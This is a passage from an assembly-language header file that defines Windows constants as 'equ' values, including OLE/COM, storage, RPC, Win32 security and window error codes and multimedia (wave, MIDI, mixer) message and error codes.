CACHE_S_LAST equ 4017Fh
CACHE_E_NOCACHE_UPDATED equ 80040170h
OLEOBJ_E_FIRST equ 80040180h
OLEOBJ_E_LAST equ 8004018Fh
OLEOBJ_S_FIRST equ 40180h
OLEOBJ_S_LAST equ 4018Fh
OLEOBJ_E_NOVERBS equ 80040180h
OLEOBJ_E_INVALIDVERB equ 80040181h
CLIENTSITE_E_FIRST equ 80040190h
CLIENTSITE_E_LAST equ 8004019Fh
CLIENTSITE_S_FIRST equ 40190h
CLIENTSITE_S_LAST equ 4019Fh
INPLACE_E_NOTUNDOABLE equ 800401A0h
INPLACE_E_NOTOOLSPACE equ 800401A1h
INPLACE_E_FIRST equ 800401A0h
INPLACE_E_LAST equ 800401AFh
INPLACE_S_FIRST equ 401A0h
INPLACE_S_LAST equ 401AFh
ENUM_E_FIRST equ 800401B0h
ENUM_E_LAST equ 800401BFh
ENUM_S_FIRST equ 401B0h
ENUM_S_LAST equ 401BFh
CONVERT10_E_FIRST equ 800401C0h
CONVERT10_E_LAST equ 800401CFh
CONVERT10_S_FIRST equ 401C0h
CONVERT10_S_LAST equ 401CFh
CONVERT10_E_OLESTREAM_GET equ 800401C0h
CONVERT10_E_OLESTREAM_PUT equ 800401C1h
CONVERT10_E_OLESTREAM_FMT equ 800401C2h
CONVERT10_E_OLESTREAM_BITMAP_TO_DIB equ 800401C3h
CONVERT10_E_STG_FMT equ 800401C4h
CONVERT10_E_STG_NO_STD_STREAM equ 800401C5h
CONVERT10_E_STG_DIB_TO_BITMAP equ 800401C6h
CLIPBRD_E_FIRST equ 800401D0h
CLIPBRD_E_LAST equ 800401DFh
CLIPBRD_S_FIRST equ 401D0h
CLIPBRD_S_LAST equ 401DFh
CLIPBRD_E_CANT_OPEN equ 800401D0h
CLIPBRD_E_CANT_EMPTY equ 800401D1h
CLIPBRD_E_CANT_SET equ 800401D2h
CLIPBRD_E_BAD_DATA equ 800401D3h
CLIPBRD_E_CANT_CLOSE equ 800401D4h
MK_E_FIRST equ 800401E0h
MK_E_LAST equ 800401EFh
MK_S_FIRST equ 401E0h
MK_S_LAST equ 401EFh
MK_E_CONNECTMANUALLY equ 800401E0h
MK_E_EXCEEDEDDEADLINE equ 800401E1h
MK_E_NEEDGENERIC equ 800401E2h
MK_E_UNAVAILABLE equ 800401E3h
MK_E_SYNTAX equ 800401E4h
MK_E_NOOBJECT equ 800401E5h
MK_E_INVALIDEXTENSION equ 800401E6h
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED equ 800401E7h
MK_E_NOTBINDABLE equ 800401E8h
MK_E_NOTBOUND equ 800401E9h
MK_E_CANTOPENFILE equ 800401EAh
MK_E_MUSTBOTHERUSER equ 800401EBh
MK_E_NOINVERSE equ 800401ECh
MK_E_NOSTORAGE equ 800401EDh
MK_E_NOPREFIX equ 800401EEh
MK_E_ENUMERATION_FAILED equ 800401EFh
CO_E_FIRST equ 800401F0h
CO_E_LAST equ 800401FFh
CO_S_FIRST equ 401F0h
CO_S_LAST equ 401FFh
CO_E_NOTINITIALIZED equ 800401F0h
CO_E_ALREADYINITIALIZED equ 800401F1h
CO_E_CANTDETERMINECLASS equ 800401F2h
CO_E_CLASSSTRING equ 800401F3h
CO_E_IIDSTRING equ 800401F4h
CO_E_APPNOTFOUND equ 800401F5h
CO_E_APPSINGLEUSE equ 800401F6h
CO_E_ERRORINAPP equ 800401F7h
CO_E_DLLNOTFOUND equ 800401F8h
CO_E_ERRORINDLL equ 800401F9h
CO_E_WRONGOSFORAPP equ 800401FAh
CO_E_OBJNOTREG equ 800401FBh
CO_E_OBJISREG equ 800401FCh
CO_E_OBJNOTCONNECTED equ 800401FDh
CO_E_APPDIDNTREG equ 800401FEh
CO_E_RELEASED equ 800401FFh
OLE_S_USEREG equ 40000h
OLE_S_STATIC equ 40001h
OLE_S_MAC_CLIPFORMAT equ 40002h
DRAGDROP_S_DROP equ 40100h
DRAGDROP_S_CANCEL equ 40101h
DRAGDROP_S_USEDEFAULTCURSORS equ 40102h
DATA_S_SAMEFORMATETC equ 40130h
VIEW_S_ALREADY_FROZEN equ 40140h
CACHE_S_FORMATETC_NOTSUPPORTED equ 40170h
CACHE_S_SAMECACHE equ 40171h
CACHE_S_SOMECACHES_NOTUPDATED equ 40172h
OLEOBJ_S_INVALIDVERB equ 40180h
OLEOBJ_S_CANNOT_DOVERB_NOW equ 40181h
OLEOBJ_S_INVALIDHWND equ 40182h
INPLACE_S_TRUNCATED equ 401A0h
CONVERT10_S_NO_PRESENTATION equ 401C0h
MK_S_REDUCED_TO_SELF equ 401E2h
MK_S_ME equ 401E4h
MK_S_HIM equ 401E5h
MK_S_US equ 401E6h
MK_S_MONIKERALREADYREGISTERED equ 401E7h
CO_E_CLASS_CREATE_FAILED equ 80080001h
CO_E_SCM_ERROR equ 80080002h
CO_E_SCM_RPC_FAILURE equ 80080003h
CO_E_BAD_PATH equ 80080004h
CO_E_SERVER_EXEC_FAILURE equ 80080005h
CO_E_OBJSRV_RPC_FAILURE equ 80080006h
MK_E_NO_NORMALIZED equ 80080007h
CO_E_SERVER_STOPPING equ 80080008h
MEM_E_INVALID_ROOT equ 80080009h
MEM_E_INVALID_LINK equ 80080010h
MEM_E_INVALID_SIZE equ 80080011h
DISP_E_UNKNOWNINTERFACE equ 80020001h
DISP_E_MEMBERNOTFOUND equ 80020003h
DISP_E_PARAMNOTFOUND equ 80020004h
DISP_E_TYPEMISMATCH equ 80020005h
DISP_E_UNKNOWNNAME equ 80020006h
DISP_E_NONAMEDARGS equ 80020007h
DISP_E_BADVARTYPE equ 80020008h
DISP_E_EXCEPTION equ 80020009h
DISP_E_OVERFLOW equ 8002000Ah
DISP_E_BADINDEX equ 8002000Bh
DISP_E_UNKNOWNLCID equ 8002000Ch
DISP_E_ARRAYISLOCKED equ 8002000Dh
DISP_E_BADPARAMCOUNT equ 8002000Eh
DISP_E_PARAMNOTOPTIONAL equ 8002000Fh
DISP_E_BADCALLEE equ 80020010h
DISP_E_NOTACOLLECTION equ 80020011h
TYPE_E_BUFFERTOOSMALL equ 80028016h
TYPE_E_INVDATAREAD equ 80028018h
TYPE_E_UNSUPFORMAT equ 80028019h
TYPE_E_REGISTRYACCESS equ 8002801Ch
TYPE_E_LIBNOTREGISTERED equ 8002801Dh
TYPE_E_UNDEFINEDTYPE equ 80028027h
TYPE_E_QUALIFIEDNAMEDISALLOWED equ 80028028h
TYPE_E_INVALIDSTATE equ 80028029h
TYPE_E_WRONGTYPEKIND equ 8002802Ah
TYPE_E_ELEMENTNOTFOUND equ 8002802Bh
TYPE_E_AMBIGUOUSNAME equ 8002802Ch
TYPE_E_NAMECONFLICT equ 8002802Dh
TYPE_E_UNKNOWNLCID equ 8002802Eh
TYPE_E_DLLFUNCTIONNOTFOUND equ 8002802Fh
TYPE_E_BADMODULEKIND equ 800288BDh
TYPE_E_SIZETOOBIG equ 800288C5h
TYPE_E_DUPLICATEID equ 800288C6h
TYPE_E_INVALIDID equ 800288CFh
TYPE_E_TYPEMISMATCH equ 80028CA0h
TYPE_E_OUTOFBOUNDS equ 80028CA1h
TYPE_E_IOERROR equ 80028CA2h
TYPE_E_CANTCREATETMPFILE equ 80028CA3h
TYPE_E_CANTLOADLIBRARY equ 80029C4Ah
TYPE_E_INCONSISTENTPROPFUNCS equ 80029C83h
TYPE_E_CIRCULARTYPE equ 80029C84h
STG_E_INVALIDFUNCTION equ 80030001h
STG_E_FILENOTFOUND equ 80030002h
STG_E_PATHNOTFOUND equ 80030003h
STG_E_TOOMANYOPENFILES equ 80030004h
STG_E_ACCESSDENIED equ 80030005h
STG_E_INVALIDHANDLE equ 80030006h
STG_E_INSUFFICIENTMEMORY equ 80030008h
STG_E_INVALIDPOINTER equ 80030009h
STG_E_NOMOREFILES equ 80030012h
STG_E_DISKISWRITEPROTECTED equ 80030013h
STG_E_SEEKERROR equ 80030019h
STG_E_WRITEFAULT equ 8003001Dh
STG_E_READFAULT equ 8003001Eh
STG_E_SHAREVIOLATION equ 80030020h
STG_E_LOCKVIOLATION equ 80030021h
STG_E_FILEALREADYEXISTS equ 80030050h
STG_E_INVALIDPARAMETER equ 80030057h
STG_E_MEDIUMFULL equ 80030070h
STG_E_ABNORMALAPIEXIT equ 800300FAh
STG_E_INVALIDHEADER equ 800300FBh
STG_E_INVALIDNAME equ 800300FCh
STG_E_UNKNOWN equ 800300FDh
STG_E_UNIMPLEMENTEDFUNCTION equ 800300FEh
STG_E_INVALIDFLAG equ 800300FFh
STG_E_INUSE equ 80030100h
STG_E_NOTCURRENT equ 80030101h
STG_E_REVERTED equ 80030102h
STG_E_CANTSAVE equ 80030103h
STG_E_OLDFORMAT equ 80030104h
STG_E_OLDDLL equ 80030105h
STG_E_SHAREREQUIRED equ 80030106h
STG_E_NOTFILEBASEDSTORAGE equ 80030107h
STG_E_EXTANTMARSHALLINGS equ 80030108h
STG_S_CONVERTED equ 30200h
RPC_E_CALL_REJECTED equ 80010001h
RPC_E_CALL_CANCELED equ 80010002h
RPC_E_CANTPOST_INSENDCALL equ 80010003h
RPC_E_CANTCALLOUT_INASYNCCALL equ 80010004h
RPC_E_CANTCALLOUT_INEXTERNALCALL equ 80010005h
RPC_E_CONNECTION_TERMINATED equ 80010006h
RPC_E_SERVER_DIED equ 80010007h
RPC_E_CLIENT_DIED equ 80010008h
RPC_E_INVALID_DATAPACKET equ 80010009h
RPC_E_CANTTRANSMIT_CALL equ 8001000Ah
RPC_E_CLIENT_CANTMARSHAL_DATA equ 8001000Bh
RPC_E_CLIENT_CANTUNMARSHAL_DATA equ 8001000Ch
RPC_E_SERVER_CANTMARSHAL_DATA equ 8001000Dh
RPC_E_SERVER_CANTUNMARSHAL_DATA equ 8001000Eh
RPC_E_INVALID_DATA equ 8001000Fh
RPC_E_INVALID_PARAMETER equ 80010010h
RPC_E_CANTCALLOUT_AGAIN equ 80010011h
RPC_E_SERVER_DIED_DNE equ 80010012h
RPC_E_SYS_CALL_FAILED equ 80010100h
RPC_E_OUT_OF_RESOURCES equ 80010101h
RPC_E_ATTEMPTED_MULTITHREAD equ 80010102h
RPC_E_NOT_REGISTERED equ 80010103h
RPC_E_FAULT equ 80010104h
RPC_E_SERVERFAULT equ 80010105h
RPC_E_CHANGED_MODE equ 80010106h
RPC_E_INVALIDMETHOD equ 80010107h
RPC_E_DISCONNECTED equ 80010108h
RPC_E_RETRY equ 80010109h
RPC_E_SERVERCALL_RETRYLATER equ 8001010Ah
RPC_E_SERVERCALL_REJECTED equ 8001010Bh
RPC_E_INVALID_CALLDATA equ 8001010Ch
RPC_E_CANTCALLOUT_ININPUTSYNCCALL equ 8001010Dh
RPC_E_WRONG_THREAD equ 8001010Eh
RPC_E_THREAD_NOT_INIT equ 8001010Fh
RPC_E_UNEXPECTED equ 8001FFFFh
ERROR_BAD_USERNAME equ 2202
ERROR_NOT_CONNECTED equ 2250
ERROR_OPEN_FILES equ 2401
ERROR_DEVICE_IN_USE equ 2404
ERROR_BAD_DEVICE equ 1200
ERROR_CONNECTION_UNAVAIL equ 1201
ERROR_DEVICE_ALREADY_REMEMBERED equ 1202
ERROR_NO_NET_OR_BAD_PATH equ 1203
ERROR_BAD_PROVIDER equ 1204
ERROR_CANNOT_OPEN_PROFILE equ 1205
ERROR_BAD_PROFILE equ 1206
ERROR_NOT_CONTAINER equ 1207
ERROR_EXTENDED_ERROR equ 1208
ERROR_INVALID_GROUPNAME equ 1209
ERROR_INVALID_COMPUTERNAME equ 1210
ERROR_INVALID_EVENTNAME equ 1211
ERROR_INVALID_DOMAINNAME equ 1212
ERROR_INVALID_SERVICENAME equ 1213
ERROR_INVALID_NETNAME equ 1214
ERROR_INVALID_SHARENAME equ 1215
ERROR_INVALID_PASSWORDNAME equ 1216
ERROR_INVALID_MESSAGENAME equ 1217
ERROR_INVALID_MESSAGEDEST equ 1218
ERROR_SESSION_CREDENTIAL_CONFLICT equ 1219
ERROR_REMOTE_SESSION_LIMIT_EXCEEDED equ 1220
ERROR_DUP_DOMAINNAME equ 1221
ERROR_NO_NETWORK equ 1222
ERROR_NOT_ALL_ASSIGNED equ 1300
ERROR_SOME_NOT_MAPPED equ 1301
ERROR_NO_QUOTAS_FOR_ACCOUNT equ 1302
ERROR_LOCAL_USER_SESSION_KEY equ 1303
ERROR_NULL_LM_PASSWORD equ 1304
ERROR_UNKNOWN_REVISION equ 1305
ERROR_REVISION_MISMATCH equ 1306
ERROR_INVALID_OWNER equ 1307
ERROR_INVALID_PRIMARY_GROUP equ 1308
ERROR_NO_IMPERSONATION_TOKEN equ 1309
ERROR_CANT_DISABLE_MANDATORY equ 1310
ERROR_NO_LOGON_SERVERS equ 1311
ERROR_NO_SUCH_LOGON_SESSION equ 1312
ERROR_NO_SUCH_PRIVILEGE equ 1313
ERROR_PRIVILEGE_NOT_HELD equ 1314
ERROR_INVALID_ACCOUNT_NAME equ 1315
ERROR_USER_EXISTS equ 1316
ERROR_NO_SUCH_USER equ 1317
ERROR_GROUP_EXISTS equ 1318
ERROR_NO_SUCH_GROUP equ 1319
ERROR_MEMBER_IN_GROUP equ 1320
ERROR_MEMBER_NOT_IN_GROUP equ 1321
ERROR_LAST_ADMIN equ 1322
ERROR_WRONG_PASSWORD equ 1323
ERROR_ILL_FORMED_PASSWORD equ 1324
ERROR_PASSWORD_RESTRICTION equ 1325
ERROR_LOGON_FAILURE equ 1326
ERROR_ACCOUNT_RESTRICTION equ 1327
ERROR_INVALID_LOGON_HOURS equ 1328
ERROR_INVALID_WORKSTATION equ 1329
ERROR_PASSWORD_EXPIRED equ 1330
ERROR_ACCOUNT_DISABLED equ 1331
ERROR_NONE_MAPPED equ 1332
ERROR_TOO_MANY_LUIDS_REQUESTED equ 1333
ERROR_LUIDS_EXHAUSTED equ 1334
ERROR_INVALID_SUB_AUTHORITY equ 1335
ERROR_INVALID_ACL equ 1336
ERROR_INVALID_SID equ 1337
ERROR_INVALID_SECURITY_DESCR equ 1338
ERROR_BAD_INHERITANCE_ACL equ 1340
ERROR_SERVER_DISABLED equ 1341
ERROR_SERVER_NOT_DISABLED equ 1342
ERROR_INVALID_ID_AUTHORITY equ 1343
ERROR_ALLOTTED_SPACE_EXCEEDED equ 1344
ERROR_INVALID_GROUP_ATTRIBUTES equ 1345
ERROR_BAD_IMPERSONATION_LEVEL equ 1346
ERROR_CANT_OPEN_ANONYMOUS equ 1347
ERROR_BAD_VALIDATION_CLASS equ 1348
ERROR_BAD_TOKEN_TYPE equ 1349
ERROR_NO_SECURITY_ON_OBJECT equ 1350
ERROR_CANT_ACCESS_DOMAIN_INFO equ 1351
ERROR_INVALID_SERVER_STATE equ 1352
ERROR_INVALID_DOMAIN_STATE equ 1353
ERROR_INVALID_DOMAIN_ROLE equ 1354
ERROR_NO_SUCH_DOMAIN equ 1355
ERROR_DOMAIN_EXISTS equ 1356
ERROR_DOMAIN_LIMIT_EXCEEDED equ 1357
ERROR_INTERNAL_DB_CORRUPTION equ 1358
ERROR_INTERNAL_ERROR equ 1359
ERROR_GENERIC_NOT_MAPPED equ 1360
ERROR_BAD_DESCRIPTOR_FORMAT equ 1361
ERROR_NOT_LOGON_PROCESS equ 1362
ERROR_LOGON_SESSION_EXISTS equ 1363
ERROR_NO_SUCH_PACKAGE equ 1364
ERROR_BAD_LOGON_SESSION_STATE equ 1365
ERROR_LOGON_SESSION_COLLISION equ 1366
ERROR_INVALID_LOGON_TYPE equ 1367
ERROR_CANNOT_IMPERSONATE equ 1368
ERROR_RXACT_INVALID_STATE equ 1369
ERROR_RXACT_COMMIT_FAILURE equ 1370
ERROR_SPECIAL_ACCOUNT equ 1371
ERROR_SPECIAL_GROUP equ 1372
ERROR_SPECIAL_USER equ 1373
ERROR_MEMBERS_PRIMARY_GROUP equ 1374
ERROR_TOKEN_ALREADY_IN_USE equ 1375
ERROR_NO_SUCH_ALIAS equ 1376
ERROR_MEMBER_NOT_IN_ALIAS equ 1377
ERROR_MEMBER_IN_ALIAS equ 1378
ERROR_ALIAS_EXISTS equ 1379
ERROR_LOGON_NOT_GRANTED equ 1380
ERROR_TOO_MANY_SECRETS equ 1381
ERROR_SECRET_TOO_LONG equ 1382
ERROR_INTERNAL_DB_ERROR equ 1383
ERROR_TOO_MANY_CONTEXT_IDS equ 1384
ERROR_LOGON_TYPE_NOT_GRANTED equ 1385
ERROR_NT_CROSS_ENCRYPTION_REQUIRED equ 1386
ERROR_NO_SUCH_MEMBER equ 1387
ERROR_INVALID_MEMBER equ 1388
ERROR_TOO_MANY_SIDS equ 1389
ERROR_LM_CROSS_ENCRYPTION_REQUIRED equ 1390
ERROR_NO_INHERITANCE equ 1391
ERROR_FILE_CORRUPT equ 1392
ERROR_DISK_CORRUPT equ 1393
ERROR_NO_USER_SESSION_KEY equ 1394
ERROR_INVALID_WINDOW_HANDLE equ 1400
ERROR_INVALID_MENU_HANDLE equ 1401
ERROR_INVALID_CURSOR_HANDLE equ 1402
ERROR_INVALID_ACCEL_HANDLE equ 1403
ERROR_INVALID_HOOK_HANDLE equ 1404
ERROR_INVALID_DWP_HANDLE equ 1405
ERROR_TLW_WITH_WSCHILD equ 1406
ERROR_CANNOT_FIND_WND_CLASS equ 1407
ERROR_WINDOW_OF_OTHER_THREAD equ 1408
ERROR_HOTKEY_ALREADY_REGISTERED equ 1409
ERROR_CLASS_ALREADY_EXISTS equ 1410
ERROR_CLASS_DOES_NOT_EXIST equ 1411
ERROR_CLASS_HAS_WINDOWS equ 1412
ERROR_INVALID_INDEX equ 1413
ERROR_INVALID_ICON_HANDLE equ 1414
ERROR_PRIVATE_DIALOG_INDEX equ 1415
ERROR_LISTBOX_ID_NOT_FOUND equ 1416
ERROR_NO_WILDCARD_CHARACTERS equ 1417
ERROR_CLIPBOARD_NOT_OPEN equ 1418
ERROR_HOTKEY_NOT_REGISTERED equ 1419
ERROR_WINDOW_NOT_DIALOG equ 1420
ERROR_CONTROL_ID_NOT_FOUND equ 1421
ERROR_INVALID_COMBOBOX_MESSAGE equ 1422
ERROR_WINDOW_NOT_COMBOBOX equ 1423
ERROR_INVALID_EDIT_HEIGHT equ 1424
ERROR_DC_NOT_FOUND equ 1425
ERROR_INVALID_HOOK_FILTER equ 1426
ERROR_INVALID_FILTER_PROC equ 1427
ERROR_HOOK_NEEDS_HMOD equ 1428
ERROR_PUBLIC_ONLY_HOOK equ 1429
ERROR_JOURNAL_HOOK_SET equ 1430
ERROR_HOOK_NOT_INSTALLED equ 1431
ERROR_INVALID_LB_MESSAGE equ 1432
ERROR_SETCOUNT_ON_BAD_LB equ 1433
ERROR_LB_WITHOUT_TABSTOPS equ 1434
ERROR_DESTROY_OBJECT_OF_OTHER_THREAD equ 1435
ERROR_CHILD_WINDOW_MENU equ 1436
ERROR_NO_SYSTEM_MENU equ 1437
ERROR_INVALID_MSGBOX_STYLE equ 1438
ERROR_INVALID_SPI_VALUE equ 1439
ERROR_SCREEN_ALREADY_LOCKED equ 1440
ERROR_HWNDS_HAVE_DIFF_PARENT equ 1441
ERROR_NOT_CHILD_WINDOW equ 1442
ERROR_INVALID_GW_COMMAND equ 1443
ERROR_INVALID_THREAD_ID equ 1444
ERROR_NON_MDICHILD_WINDOW equ 1445
ERROR_POPUP_ALREADY_ACTIVE equ 1446
ERROR_NO_SCROLLBARS equ 1447
ERROR_INVALID_SCROLLBAR_RANGE equ 1448
ERROR_INVALID_SHOWWIN_COMMAND equ 1449
ERROR_EVENTLOG_FILE_CORRUPT equ 1500
ERROR_EVENTLOG_CANT_START equ 1501
ERROR_LOG_FILE_FULL equ 1502
ERROR_EVENTLOG_FILE_CHANGED equ 1503
RPC_S_INVALID_STRING_BINDING equ 1700
RPC_S_WRONG_KIND_OF_BINDING equ 1701
RPC_S_INVALID_BINDING equ 1702
RPC_S_PROTSEQ_NOT_SUPPORTED equ 1703
RPC_S_INVALID_RPC_PROTSEQ equ 1704
RPC_S_INVALID_STRING_UUID equ 1705
RPC_S_INVALID_ENDPOINT_FORMAT equ 1706
RPC_S_INVALID_NET_ADDR equ 1707
RPC_S_NO_ENDPOINT_FOUND equ 1708
RPC_S_INVALID_TIMEOUT equ 1709
RPC_S_OBJECT_NOT_FOUND equ 1710
RPC_S_ALREADY_REGISTERED equ 1711
RPC_S_TYPE_ALREADY_REGISTERED equ 1712
RPC_S_ALREADY_LISTENING equ 1713
RPC_S_NO_PROTSEQS_REGISTERED equ 1714
RPC_S_NOT_LISTENING equ 1715
RPC_S_UNKNOWN_MGR_TYPE equ 1716
RPC_S_UNKNOWN_IF equ 1717
RPC_S_NO_BINDINGS equ 1718
RPC_S_NO_PROTSEQS equ 1719
RPC_S_CANT_CREATE_ENDPOINT equ 1720
RPC_S_OUT_OF_RESOURCES equ 1721
RPC_S_SERVER_UNAVAILABLE equ 1722
RPC_S_SERVER_TOO_BUSY equ 1723
RPC_S_INVALID_NETWORK_OPTIONS equ 1724
RPC_S_NO_CALL_ACTIVE equ 1725
RPC_S_CALL_FAILED equ 1726
RPC_S_CALL_FAILED_DNE equ 1727
RPC_S_PROTOCOL_ERROR equ 1728
RPC_S_UNSUPPORTED_TRANS_SYN equ 1730
RPC_S_UNSUPPORTED_TYPE equ 1732
RPC_S_INVALID_TAG equ 1733
RPC_S_INVALID_BOUND equ 1734
RPC_S_NO_ENTRY_NAME equ 1735
RPC_S_INVALID_NAME_SYNTAX equ 1736
RPC_S_UNSUPPORTED_NAME_SYNTAX equ 1737
RPC_S_UUID_NO_ADDRESS equ 1739
RPC_S_DUPLICATE_ENDPOINT equ 1740
RPC_S_UNKNOWN_AUTHN_TYPE equ 1741
RPC_S_MAX_CALLS_TOO_SMALL equ 1742
RPC_S_STRING_TOO_LONG equ 1743
RPC_S_PROTSEQ_NOT_FOUND equ 1744
RPC_S_PROCNUM_OUT_OF_RANGE equ 1745
RPC_S_BINDING_HAS_NO_AUTH equ 1746
RPC_S_UNKNOWN_AUTHN_SERVICE equ 1747
RPC_S_UNKNOWN_AUTHN_LEVEL equ 1748
RPC_S_INVALID_AUTH_IDENTITY equ 1749
RPC_S_UNKNOWN_AUTHZ_SERVICE equ 1750
EPT_S_INVALID_ENTRY equ 1751
EPT_S_CANT_PERFORM_OP equ 1752
EPT_S_NOT_REGISTERED equ 1753
RPC_S_NOTHING_TO_EXPORT equ 1754
RPC_S_INCOMPLETE_NAME equ 1755
RPC_S_INVALID_VERS_OPTION equ 1756
RPC_S_NO_MORE_MEMBERS equ 1757
RPC_S_NOT_ALL_OBJS_UNEXPORTED equ 1758
RPC_S_INTERFACE_NOT_FOUND equ 1759
RPC_S_ENTRY_ALREADY_EXISTS equ 1760
RPC_S_ENTRY_NOT_FOUND equ 1761
RPC_S_NAME_SERVICE_UNAVAILABLE equ 1762
RPC_S_INVALID_NAF_ID equ 1763
RPC_S_CANNOT_SUPPORT equ 1764
RPC_S_NO_CONTEXT_AVAILABLE equ 1765
RPC_S_INTERNAL_ERROR equ 1766
RPC_S_ZERO_DIVIDE equ 1767
RPC_S_ADDRESS_ERROR equ 1768
RPC_S_FP_DIV_ZERO equ 1769
RPC_S_FP_UNDERFLOW equ 1770
RPC_S_FP_OVERFLOW equ 1771
RPC_X_NO_MORE_ENTRIES equ 1772
RPC_X_SS_CHAR_TRANS_OPEN_FAIL equ 1773
RPC_X_SS_CHAR_TRANS_SHORT_FILE equ 1774
RPC_X_SS_IN_NULL_CONTEXT equ 1775
RPC_X_SS_CONTEXT_DAMAGED equ 1777
RPC_X_SS_HANDLES_MISMATCH equ 1778
RPC_X_SS_CANNOT_GET_CALL_HANDLE equ 1779
RPC_X_NULL_REF_POINTER equ 1780
RPC_X_ENUM_VALUE_OUT_OF_RANGE equ 1781
RPC_X_BYTE_COUNT_TOO_SMALL equ 1782
RPC_X_BAD_STUB_DATA equ 1783
ERROR_INVALID_USER_BUFFER equ 1784
ERROR_UNRECOGNIZED_MEDIA equ 1785
ERROR_NO_TRUST_LSA_SECRET equ 1786
ERROR_NO_TRUST_SAM_ACCOUNT equ 1787
ERROR_TRUSTED_DOMAIN_FAILURE equ 1788
ERROR_TRUSTED_RELATIONSHIP_FAILURE equ 1789
ERROR_TRUST_FAILURE equ 1790
RPC_S_CALL_IN_PROGRESS equ 1791
ERROR_NETLOGON_NOT_STARTED equ 1792
ERROR_ACCOUNT_EXPIRED equ 1793
ERROR_REDIRECTOR_HAS_OPEN_HANDLES equ 1794
ERROR_PRINTER_DRIVER_ALREADY_INSTALLED equ 1795
ERROR_UNKNOWN_PORT equ 1796
ERROR_UNKNOWN_PRINTER_DRIVER equ 1797
ERROR_UNKNOWN_PRINTPROCESSOR equ 1798
ERROR_INVALID_SEPARATOR_FILE equ 1799
ERROR_INVALID_PRIORITY equ 1800
ERROR_INVALID_PRINTER_NAME equ 1801
ERROR_PRINTER_ALREADY_EXISTS equ 1802
ERROR_INVALID_PRINTER_COMMAND equ 1803
ERROR_INVALID_DATATYPE equ 1804
ERROR_INVALID_ENVIRONMENT equ 1805
RPC_S_NO_MORE_BINDINGS equ 1806
ERROR_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT equ 1807
ERROR_NOLOGON_WORKSTATION_TRUST_ACCOUNT equ 1808
ERROR_NOLOGON_SERVER_TRUST_ACCOUNT equ 1809
ERROR_DOMAIN_TRUST_INCONSISTENT equ 1810
ERROR_SERVER_HAS_OPEN_HANDLES equ 1811
ERROR_RESOURCE_DATA_NOT_FOUND equ 1812
ERROR_RESOURCE_TYPE_NOT_FOUND equ 1813
ERROR_RESOURCE_NAME_NOT_FOUND equ 1814
ERROR_RESOURCE_LANG_NOT_FOUND equ 1815
ERROR_NOT_ENOUGH_QUOTA equ 1816
RPC_S_GROUP_MEMBER_NOT_FOUND equ 1898
EPT_S_CANT_CREATE equ 1899
RPC_S_INVALID_OBJECT equ 1900
ERROR_INVALID_TIME equ 1901
ERROR_INVALID_FORM_NAME equ 1902
ERROR_INVALID_FORM_SIZE equ 1903
ERROR_ALREADY_WAITING equ 1904
ERROR_PRINTER_DELETED equ 1905
ERROR_INVALID_PRINTER_STATE equ 1906
ERROR_NO_BROWSER_SERVERS_FOUND equ 6118
MAXPNAMELEN equ 32
MAXERRORLENGTH equ 128
TIME_MS equ 1h
TIME_SAMPLES equ 2h
TIME_BYTES equ 4h
TIME_SMPTE equ 8h
TIME_MIDI equ 10h
MM_JOY1MOVE equ 3A0h
MM_JOY2MOVE equ 3A1h
MM_JOY1ZMOVE equ 3A2h
MM_JOY2ZMOVE equ 3A3h
MM_JOY1BUTTONDOWN equ 3B5h
MM_JOY2BUTTONDOWN equ 3B6h
MM_JOY1BUTTONUP equ 3B7h
MM_JOY2BUTTONUP equ 3B8h
MM_MCINOTIFY equ 3B9h
MM_MCISYSTEM_STRING equ 3CAh
MM_WOM_OPEN equ 3BBh
MM_WOM_CLOSE equ 3BCh
MM_WOM_DONE equ 3BDh
MM_WIM_OPEN equ 3BEh
MM_WIM_CLOSE equ 3BFh
MM_WIM_DATA equ 3C0h
MM_MIM_OPEN equ 3C1h
MM_MIM_CLOSE equ 3C2h
MM_MIM_DATA equ 3C3h
MM_MIM_LONGDATA equ 3C4h
MM_MIM_ERROR equ 3C5h
MM_MIM_LONGERROR equ 3C6h
MM_MOM_OPEN equ 3C7h
MM_MOM_CLOSE equ 3C8h
MM_MOM_DONE equ 3C9h
MMSYSERR_BASE equ 0
WAVERR_BASE equ 32
MIDIERR_BASE equ 64
TIMERR_BASE equ 96
JOYERR_BASE equ 160
MCIERR_BASE equ 256
MCI_STRING_OFFSET equ 512
MCI_VD_OFFSET equ 1024
MCI_CD_OFFSET equ 1088
MCI_WAVE_OFFSET equ 1152
MCI_SEQ_OFFSET equ 1216
MMSYSERR_NOERROR equ 0
MMSYSERR_ERROR equ MMSYSERR_BASE+1
MMSYSERR_BADDEVICEID equ MMSYSERR_BASE+2
MMSYSERR_NOTENABLED equ MMSYSERR_BASE+3
MMSYSERR_ALLOCATED equ MMSYSERR_BASE+4
MMSYSERR_INVALHANDLE equ MMSYSERR_BASE+5
MMSYSERR_NODRIVER equ MMSYSERR_BASE+6
MMSYSERR_NOMEM equ MMSYSERR_BASE+7
MMSYSERR_NOTSUPPORTED equ MMSYSERR_BASE+8
MMSYSERR_BADERRNUM equ MMSYSERR_BASE+9
MMSYSERR_INVALFLAG equ MMSYSERR_BASE+10
MMSYSERR_INVALPARAM equ MMSYSERR_BASE+11
MMSYSERR_HANDLEBUSY equ MMSYSERR_BASE+12
MMSYSERR_INVALIDALIAS equ MMSYSERR_BASE+13
MMSYSERR_LASTERROR equ MMSYSERR_BASE+13
MM_MOM_POSITIONCB equ 3CAh
MM_MCISIGNAL equ 3CBh
MM_MIM_MOREDATA equ 3CCh
MIDICAPS_STREAM equ 8h
MEVT_F_SHORT equ 0h
MEVT_F_LONG equ 80000000h
MEVT_F_CALLBACK equ 40000000h
MIDISTRM_ERROR equ -2
MIDIPROP_SET equ 80000000h
MIDIPROP_GET equ 40000000h
MIDIPROP_TIMEDIV equ 1h
MIDIPROP_TEMPO equ 2h
MIXER_SHORT_NAME_CHARS equ 16
MIXER_LONG_NAME_CHARS equ 64
MIXERR_BASE equ 1024
MIXERR_INVALLINE equ MIXERR_BASE+0
MIXERR_INVALCONTROL equ MIXERR_BASE+1
MIXERR_INVALVALUE equ MIXERR_BASE+2
MIXERR_LASTERROR equ MIXERR_BASE+2
MIXER_OBJECTF_HANDLE equ 80000000h
MIXER_OBJECTF_MIXER equ 0h
MIXER_OBJECTF_HMIXER equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_MIXER
MIXER_OBJECTF_WAVEOUT equ 10000000h
